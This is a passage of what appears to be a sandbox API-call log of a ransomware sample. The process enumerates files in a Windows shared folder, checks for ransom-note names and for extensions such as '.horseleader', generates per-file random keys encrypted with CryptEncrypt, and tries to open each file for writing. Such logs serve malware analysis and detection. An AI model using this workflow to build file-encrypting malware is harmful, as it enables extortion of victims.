pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 77 [0229.996] StrStrIW (lpFirst="boxed-delete.avi", lpSrch=".horseleader") returned 0x0 [0229.996] lstrcmpW (lpString1="boxed-delete.avi", lpString2="#Decrypt#.txt") returned 1 [0229.996] lstrcmpW (lpString1="boxed-delete.avi", lpString2="_uninstalling_.png") returned 1 [0229.996] lstrlenW (lpString=".testttjffg") returned 11 [0229.996] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", lpSrch=".testttjffg") returned 0x0 [0229.996] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0229.996] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0229.997] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.087] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23d9f3d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x23d9f3d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a4c5f1f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x8200, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="boxed-join.avi", cAlternateFileName="")) returned 1 [0230.088] lstrcmpiW (lpString1="boxed-join.avi", lpString2="Windows") returned -1 [0230.088] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 75 [0230.088] StrStrIW (lpFirst="boxed-join.avi", lpSrch=".horseleader") returned 0x0 [0230.088] lstrcmpW (lpString1="boxed-join.avi", lpString2="#Decrypt#.txt") returned 1 [0230.088] lstrcmpW (lpString1="boxed-join.avi", lpString2="_uninstalling_.png") returned 1 [0230.088] lstrlenW (lpString=".testttjffg") returned 11 [0230.088] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", lpSrch=".testttjffg") returned 0x0 [0230.088] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.088] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.088] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.088] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24261f7, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x24261f7, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a538339, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xf600, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="boxed-split.avi", cAlternateFileName="")) returned 1 [0230.088] lstrcmpiW (lpString1="boxed-split.avi", lpString2="Windows") returned -1 [0230.088] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 76 [0230.088] StrStrIW (lpFirst="boxed-split.avi", lpSrch=".horseleader") returned 0x0 [0230.088] lstrcmpW (lpString1="boxed-split.avi", lpString2="#Decrypt#.txt") returned 1 [0230.089] lstrcmpW (lpString1="boxed-split.avi", lpString2="_uninstalling_.png") returned 1 [0230.089] lstrlenW (lpString=".testttjffg") returned 11 [0230.089] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", lpSrch=".testttjffg") returned 0x0 [0230.089] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.089] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.089] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.089] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x244c354, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x244c354, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a55e497, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x30200, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="correct.avi", cAlternateFileName="")) returned 1 [0230.089] lstrcmpiW (lpString1="correct.avi", lpString2="Windows") returned -1 [0230.089] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 72 [0230.089] StrStrIW (lpFirst="correct.avi", lpSrch=".horseleader") returned 0x0 [0230.089] lstrcmpW (lpString1="correct.avi", lpString2="#Decrypt#.txt") returned 1 [0230.089] lstrcmpW (lpString1="correct.avi", lpString2="_uninstalling_.png") returned 1 [0230.089] lstrlenW (lpString=".testttjffg") returned 11 [0230.089] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpSrch=".testttjffg") returned 0x0 [0230.089] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.090] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.090] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.090] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24be76b, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x24be76b, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5845f5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x36c00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="delete.avi", cAlternateFileName="")) returned 1 [0230.090] lstrcmpiW (lpString1="delete.avi", lpString2="Windows") returned -1 [0230.090] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 71 [0230.090] StrStrIW (lpFirst="delete.avi", lpSrch=".horseleader") returned 0x0 [0230.090] lstrcmpW (lpString1="delete.avi", lpString2="#Decrypt#.txt") returned 1 [0230.090] lstrcmpW (lpString1="delete.avi", lpString2="_uninstalling_.png") returned 1 [0230.090] lstrlenW (lpString=".testttjffg") returned 11 [0230.090] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpSrch=".testttjffg") returned 0x0 [0230.090] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.090] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.090] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.119] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="FlickLearningWizard.exe.mui", cAlternateFileName="")) returned 1 [0230.119] lstrcmpiW (lpString1="FlickLearningWizard.exe.mui", lpString2="Windows") returned -1 [0230.119] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 88 [0230.119] StrStrIW (lpFirst="FlickLearningWizard.exe.mui", lpSrch=".horseleader") returned 0x0 [0230.119] lstrcmpW (lpString1="FlickLearningWizard.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0230.119] lstrcmpW (lpString1="FlickLearningWizard.exe.mui", lpString2="_uninstalling_.png") returned 1 [0230.119] lstrlenW (lpString=".testttjffg") returned 11 [0230.119] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui", lpSrch=".testttjffg") returned 0x0 [0230.119] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.119] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.119] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.169] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc8723b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe067905, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xdc8723b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="InkObj.dll.mui", cAlternateFileName="")) returned 1 [0230.169] lstrcmpiW (lpString1="InkObj.dll.mui", lpString2="Windows") returned -1 [0230.169] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui") returned 75 [0230.169] StrStrIW (lpFirst="InkObj.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.169] lstrcmpW (lpString1="InkObj.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.169] lstrcmpW (lpString1="InkObj.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.169] lstrlenW (lpString=".testttjffg") returned 11 [0230.169] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.169] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.169] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.170] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.170] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="InkWatson.exe.mui", cAlternateFileName="")) returned 1 [0230.170] lstrcmpiW (lpString1="InkWatson.exe.mui", lpString2="Windows") returned -1 [0230.170] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 78 [0230.170] StrStrIW (lpFirst="InkWatson.exe.mui", lpSrch=".horseleader") returned 0x0 [0230.170] lstrcmpW (lpString1="InkWatson.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0230.170] lstrcmpW (lpString1="InkWatson.exe.mui", lpString2="_uninstalling_.png") returned 1 [0230.170] lstrlenW (lpString=".testttjffg") returned 11 [0230.170] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui", lpSrch=".testttjffg") returned 0x0 [0230.170] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.170] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.171] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkwatson.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.233] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="InputPersonalization.exe.mui", cAlternateFileName="")) returned 1 [0230.233] lstrcmpiW (lpString1="InputPersonalization.exe.mui", lpString2="Windows") returned -1 [0230.233] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 89 [0230.234] StrStrIW (lpFirst="InputPersonalization.exe.mui", lpSrch=".horseleader") returned 0x0 [0230.234] lstrcmpW (lpString1="InputPersonalization.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0230.234] lstrcmpW (lpString1="InputPersonalization.exe.mui", lpString2="_uninstalling_.png") returned 1 [0230.234] lstrlenW (lpString=".testttjffg") returned 11 [0230.234] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui", lpSrch=".testttjffg") returned 0x0 [0230.234] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.234] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.234] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.254] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x5800, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="IPSEventLogMsg.dll.mui", cAlternateFileName="")) returned 1 [0230.254] lstrcmpiW (lpString1="IPSEventLogMsg.dll.mui", lpString2="Windows") returned -1 [0230.254] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 83 [0230.254] StrStrIW (lpFirst="IPSEventLogMsg.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.254] lstrcmpW (lpString1="IPSEventLogMsg.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.254] lstrcmpW (lpString1="IPSEventLogMsg.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.254] lstrlenW (lpString=".testttjffg") returned 11 [0230.254] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.254] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.254] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.254] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.255] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="IpsMigrationPlugin.dll.mui", cAlternateFileName="")) returned 1 [0230.255] lstrcmpiW (lpString1="IpsMigrationPlugin.dll.mui", lpString2="Windows") returned -1 [0230.255] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 87 [0230.255] StrStrIW (lpFirst="IpsMigrationPlugin.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.255] lstrcmpW (lpString1="IpsMigrationPlugin.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.255] lstrcmpW (lpString1="IpsMigrationPlugin.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.255] lstrlenW (lpString=".testttjffg") returned 11 [0230.255] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.255] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.256] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.256] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.256] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x250aa25, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x250aa25, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5aa753, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x36400, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="join.avi", cAlternateFileName="")) returned 1 [0230.256] lstrcmpiW (lpString1="join.avi", lpString2="Windows") returned -1 [0230.256] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 69 [0230.256] StrStrIW (lpFirst="join.avi", lpSrch=".horseleader") returned 0x0 [0230.256] lstrcmpW (lpString1="join.avi", lpString2="#Decrypt#.txt") returned 1 [0230.256] lstrcmpW (lpString1="join.avi", lpString2="_uninstalling_.png") returned 1 [0230.256] lstrlenW (lpString=".testttjffg") returned 11 [0230.256] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpSrch=".testttjffg") returned 0x0 [0230.256] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.256] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.257] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.257] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="micaut.dll.mui", cAlternateFileName="")) returned 1 [0230.257] lstrcmpiW (lpString1="micaut.dll.mui", lpString2="Windows") returned -1 [0230.257] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 75 [0230.257] StrStrIW (lpFirst="micaut.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.257] lstrcmpW (lpString1="micaut.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.257] lstrcmpW (lpString1="micaut.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.257] lstrlenW (lpString=".testttjffg") returned 11 [0230.257] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.257] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.257] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.257] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 